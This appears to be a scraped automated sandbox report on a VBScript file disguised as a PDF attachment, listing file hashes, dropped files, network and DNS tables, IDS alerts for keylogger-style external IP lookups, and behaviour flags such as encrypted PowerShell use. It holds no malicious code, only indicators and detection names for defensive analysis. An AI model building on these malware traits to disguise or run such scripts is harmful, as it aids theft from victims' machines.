4692	msiexec.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA		binary
		MD5:BD69E4E370ED1B95E850DBA1819DDA6B	SHA256:3A4662547BF4FE57F5BE4A8BB97D5FA314A7D7CB5A29D55BA0AF441892914496
8164	powershell.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache		binary
		MD5:8E7D26D71A1CAF822C338431F0651251	SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084
4692	msiexec.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199		binary
		MD5:E935BC5762068CAF3E24A2683B1B8A88	SHA256:A8ACCFCFEB51BD73DF23B91F4D89FF1A9EB7438EF5B12E8AFDA1A6FF1769E89D

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	200	2.16.241.19:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
—	—	GET	200	23.32.185.131:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
—	—	GET	200	2.16.241.19:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
—	—	GET	200	23.32.185.131:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
4680	svchost.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D	unknown	—	—	whitelisted
4360	SearchApp.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D	unknown	—	—	whitelisted
1252	SIHClient.exe	GET	200	23.32.185.131:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl	unknown	—	—	whitelisted
1252	SIHClient.exe	GET	200	23.32.185.131:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl	unknown	—	—	whitelisted
3728	backgroundTaskHost.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D	unknown	—	—	whitelisted
—	—	GET	200	172.217.16.131:80	http://c.pki.goog/r/r1.crl	unknown	—	—	whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:137	—	—	—	whitelisted
—	—	2.23.209.183:443	www.bing.com	Akamai International B.V.	GB	whitelisted
—	—	51.104.136.2:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
—	—	2.16.241.19:80	crl.microsoft.com	Akamai International B.V.	DE	whitelisted
—	—	23.32.185.131:80	www.microsoft.com	AKAMAI-AS	BR	whitelisted
4020	svchost.exe	239.255.255.250:1900	—	—	—	whitelisted
4680	svchost.exe	40.126.32.76:443	login.live.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
4680	svchost.exe	192.229.221.95:80	ocsp.digicert.com	EDGECAST	US	whitelisted
780	svchost.exe	23.218.210.69:443	go.microsoft.com	AKAMAI-AS	DE	whitelisted

DNS requests

Domain	IP	Reputation
www.bing.com	2.23.209.183 2.23.209.187 2.23.209.185 2.23.209.130 2.23.209.133 2.23.209.131 2.23.209.186 2.23.209.135 2.23.209.189 2.16.204.139 2.16.204.152 2.16.204.135 2.16.204.146 2.16.204.151 2.16.204.147 2.16.204.148 2.16.204.149 2.16.204.138	whitelisted
settings-win.data.microsoft.com	51.104.136.2 4.231.128.59	whitelisted
google.com	142.250.184.238	whitelisted
crl.microsoft.com	2.16.241.19 2.16.241.12	whitelisted
www.microsoft.com	23.32.185.131	whitelisted
login.live.com	40.126.32.76 20.190.160.22 40.126.32.133 40.126.32.140 20.190.160.17 40.126.32.138 20.190.160.14 40.126.32.68	whitelisted
ocsp.digicert.com	192.229.221.95	whitelisted
go.microsoft.com	23.218.210.69	whitelisted
th.bing.com	2.16.204.148 2.16.204.149 2.16.204.135 2.16.204.138 2.16.204.161 2.16.204.147 2.16.204.146 2.16.204.134 2.16.204.139	whitelisted
drive.google.com	142.250.184.238	shared

Threats

PID	Process	Class	Message
—	—	Device Retrieving External IP Address Detected	ET INFO External IP Lookup Domain in DNS Query (checkip .dyndns .org)
—	—	Device Retrieving External IP Address Detected	ET POLICY External IP Lookup - checkip.dyndns.org
—	—	Device Retrieving External IP Address Detected	ET INFO 404/Snake/Matiex Keylogger Style External IP Check
—	—	Device Retrieving External IP Address Detected	INFO [ANY.RUN] External IP Address Lookup Domain (reallyfreegeoip .org)
—	—	Misc activity	ET INFO External IP Address Lookup Domain in DNS Lookup (reallyfreegeoip .org)
—	—	Device Retrieving External IP Address Detected	ET POLICY External IP Lookup - checkip.dyndns.org
—	—	Misc activity	ET INFO External IP Lookup Service Domain (reallyfreegeoip .org) in TLS SNI
—	—	Device Retrieving External IP Address Detected	ET POLICY External IP Lookup - checkip.dyndns.org
—	—	Device Retrieving External IP Address Detected	ET POLICY External IP Lookup - checkip.dyndns.org
—	—	Device Retrieving External IP Address Detected	ET POLICY External IP Lookup - checkip.dyndns.org

Add for printing

No debug info

General Info

att1-241104022450_PDF.vbs

9D2F1B9D85E014524C2C596D60B0E4C7

9C4798635E685841EA77BF887CBB32BB200A0CDD

6819EDE9FDD746E4B94B591EBD20904BBB0B065C2A20E3F606951147C04E77E5

768:TODAJEvQefRV0/9QPrhPg691+xggNK5Is:8jvNZV0arV7H+xJNK5Is

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

GUMEN has been detected

SUSPICIOUS

Suspicious use of symmetric encryption in PowerShell

Starts POWERSHELL.EXE for commands execution

INFO

Creates or changes the value of an item property via Powershell

Manual execution by a user

Malware configuration

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings